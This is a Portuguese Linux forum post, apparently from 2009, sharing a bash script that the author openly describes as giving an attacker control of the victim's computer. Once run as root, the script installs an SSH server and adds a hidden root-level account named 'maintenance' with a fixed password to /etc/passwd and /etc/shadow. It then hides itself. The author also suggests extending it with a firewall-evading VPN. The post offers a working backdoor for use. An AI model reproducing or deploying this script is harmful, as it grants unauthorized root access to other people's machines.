Criando usuário com poderes de root
Publicado por Marcelo (última atualização em 17/10/2009)
[ Hits: 7.079 ]
Este script cria um usuário com poderes de root e ativa o ssh-server, dando ao atacante controle sobre o computador do executor do script.
Incrementando ele um pouco mais pode-se fazer maravilhas como, por exemplo, criar uma VPN diretamente entre o computador do atacante e do atacado (fugindo assim dos firewalls) e dando total acesso, através de ssh, e com poderes de super usuário ainda.
É, realmente o elo mais fraco da segurança da informação são as pessoas... administrador descuidado + usuário "bobinho" = caca!
#!/bin/bash # verifica se o usuário está como root if [ "`id -u`" != "0" ]; then echo 'Este script precisa ser executado como root. Digite "sudo su" para se logar como root e execute o script novamente.' read pausa exit 0 fi # verifica se o script de cadastro de senha existe, se não, ele mesmo o cria # o usuário será maintenance e a senha mdpasswd if [ "`find -name cad.main`" = "" ]; then touch cad.main echo "#!/usr/bin/expect" >> cad.main echo "set timeout 30" >> cad.main echo "spawn passwd maintenance" >> cad.main echo "set password \"mdpasswd"\" >> cad.main echo "expect \"Enter new UNIX password:"\" >> cad.main echo "send "\""$""password\r\"" >> cad.main echo "expect \"Retype new UNIX password:"\" >> cad.main echo "send "\""$""password\r\"" >> cad.main echo "send \"exit"\" >> cad.main echo "expect \"eof\"" >> cad.main chmod +x cad.main fi # verifica se o programa expect está instalado, se não estiver, ele o instala if [ "`dpkg -l | grep expect `" = "" ]; then aptitude install expect >> /dev/null fi # verifica se o servidor ssh está instalado, se não estiver, ele o instala if [ "`dpkg -l | grep openssh-server`" = "" ]; then aptitude install openssh-server >> /dev/null fi # verifica se já existe algum usuário com este nome, se existir ele alterará a senha deste usuário para mdpasswd if [ "`cat /etc/passwd | grep maintenance`" != "" ]; then expect cad.main >> /dev/null exit 0 fi # se o usuário não existir, ele será criado echo "maintenance:x:0:0:maintenance:/root:/bin/bash" >> /etc/passwd echo "maintenance:*:10091:0:99999:7:::" >> /etc/shadow expect cad.main >> /dev/null # remove o arquivo de cadastro de usuário rm -rf cad.min # oculta este script mv login.super .login.super exit 1
Script para balanceamento de link's de internet
Ver último twitter pelo terminal ou na barra de notificação
Nenhum comentário foi encontrado.
Pra quem contribui com artigos e dicas (0)
Arch Linux - Guia para Iniciantes (5)
tux-gpt - Assistente de IA para o Terminal
Instalação e configuração do Chrony
Programa IRPF - Guia de Instalação e Resolução de alguns Problemas
O Que Fazer Após Instalar Ubuntu 25.04
O Que Fazer Após Instalar Fedora 42
Debian 12 -- Errata - Correções de segurança
Instalando o Pi-Hole versão v5.18.4 depois do lançamento da versão v6.0
Pra quem contribui com artigos e dicas (0)
Monitor fora de escala ao bootar sistema (9)
NAT LoopBack - Hairpin NAT (2)
Alguém poderia me ajudar a escolher peças pra montar um desktop? (18)